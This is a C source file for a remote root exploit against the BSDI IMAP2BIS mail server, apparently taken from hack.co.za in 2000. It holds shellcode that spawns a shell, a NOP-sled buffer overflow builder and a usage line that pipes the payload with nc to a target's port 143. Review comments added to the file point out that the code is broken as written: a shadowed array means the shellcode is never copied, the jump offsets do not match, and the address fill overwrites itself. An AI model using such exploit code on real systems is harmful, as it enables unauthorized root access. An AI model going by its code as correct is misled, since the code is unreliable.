/*
 
  BSDI IMAP2BIS remote root exploit
 
  Usage:   (./imapx <offset>;cat)| nc targethost 143
           
             where offset = -1000..1000  (brute force if 0 doesn't work) 
 
  Note:
          if you plan to port this to another OS, make sure the
          shellcode doesn't contain lower-case characters, since imapd
          will toupper() the shellcode and corrupt it.
  Note:
          I tested this on a few systems and found these offsets vulnerable.
 
*/

#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>

#define BUFLEN 4092
#define NOP 0x90

/*
 * Payload bytes for the overflow.  The header note says the target imapd
 * upper-cases the data it receives, so the bytes must avoid the ASCII
 * lower-case range (0x61..0x7a); inspection confirms none of the bytes
 * below fall in that range, and the trailing "BIN/SH" is written in upper
 * case for the same reason.  "\xcd\x80" appears to be the x86 `int 0x80`
 * instruction (the system-call trap on BSD/Linux).
 *
 * NOTE(review): main() declares a local `char shell[1024+300]` that shadows
 * this array, so nothing in this file actually reads it -- the memcpy in
 * main copies the uninitialized local instead.
 *
 * NOTE(review): the opening "\xeb\x58" decodes as a short jump whose target,
 * 2 + 0x58 = byte index 90, is the last byte of the final "\xcd\x80" pair,
 * and there is no call back to the "\x5e" (pop esi) at byte 2.  As published
 * the sequence does not look self-consistent; verify before assuming it runs.
 *
 * Length: 98 bytes plus the implicit terminator (sizeof == 99); strlen() is
 * 97 because it stops at the explicit "\x00" after "BIN/SH", so that NUL
 * would be dropped by any strlen()-bounded copy.
 */
char shell[] =

  "\xeb\x58\x5e"
  "\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26"
  "\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8"
  "\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2"
  "\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31"
  "\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31"
  "\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1"
  "\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83"
  "\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80"
  "\x42\x49\x4e\x2f\x53\x48\x00";

/*
 * Entry point: builds a BUFLEN-byte overflow payload and writes it to stdout
 * (the pipeline in the header comment forwards it to the target's port 143).
 *
 * argv[1] is the signed adjustment, in bytes, applied to the hard-coded
 * stack-address guess `esp`.
 *
 * NOTE(review): `void main` is not a conforming signature for main, and
 * argv[1] is used without checking argc, so running with no argument
 * dereferences a NULL pointer.  The usage line is printed unconditionally.
 */
void
main (int argc, char *argv[])
{
  char buf[BUFLEN];
  int offset,nop,i;
  unsigned long esp;
  /*
   * NOTE(review): this local `shell` SHADOWS the file-scope `shell[]` that
   * holds the opcode bytes.  Every use of `shell` in this function therefore
   * refers to this uninitialized 1324-byte stack array: the memcpy below
   * copies strlen() of uninitialized memory (undefined behaviour, unbounded
   * read), and the global shellcode never reaches the payload at all.
   */
  char shell[1024+300];

  /* Usage goes to stderr so it does not contaminate the payload on stdout. */
  fprintf(stderr,"usage: %s <offset>\n", argv[0]);

  nop = 403;                /* byte offset in buf where the "shellcode" is placed */
  esp = 0xefbfd5e8;         /* hard-coded guess of the target's stack address */
  offset = atoi(argv[1]);   /* no error/range check; the -1000..1000 range in the
                               header is not enforced, and junk input yields 0 */

  memset(buf, NOP, BUFLEN); /* 0x90 NOP sled over the whole buffer */
  /* See the shadowing note above: this copies the wrong `shell`. */
  memcpy(buf+(long)nop, shell, strlen(shell));

  /*
   * Fill buf[1024 .. BUFLEN-1] with the candidate return address.  The last
   * iteration (i == 4088) writes bytes 4088..4091, so the stores stay in
   * bounds.  However each store writes 4 bytes while the loop advances 2, so
   * every store overwrites the upper half of the previous one: the region
   * ends up as the low 16 bits of (esp+offset) repeated, with only the very
   * last store intact.  The stores are unaligned and type-pun through an
   * int* (undefined in ISO C; tolerated on x86), and on an LP64 host the
   * unsigned-long sum is truncated to 32 bits by the int store.  The
   * assignment to shell[...] touches the local array only and has no
   * effect on the output.
   *
   * NOTE(review): if imapd really toupper()s the data (see header), address
   * bytes such as 0xe8/0xd5/0xef are outside ASCII a-z, but whether toupper()
   * alters high bytes depends on the server's locale -- confirm on target.
   */
  for (i = 1024; i < BUFLEN - 3; i += 2)
    {
      *((int *) &buf[i]) = esp + (long) offset;
      shell[ sizeof(shell)-1 ] = 0;
    }

  /* Announce an IMAP literal of BUFLEN bytes, then emit the raw buffer
   * byte-for-byte (putchar, not printf, so embedded 0x00/0x25 are kept). */
  printf("{%d} AUTH\r\n", BUFLEN);
  for (i = 0; i < BUFLEN; i++)
    putchar(buf[i]);

  printf("\r\n");

  /* stdout is not flushed or checked explicitly; exit status is unspecified
   * because main is declared void. */
  return;
}
/*                    www.hack.co.za              [2000]*/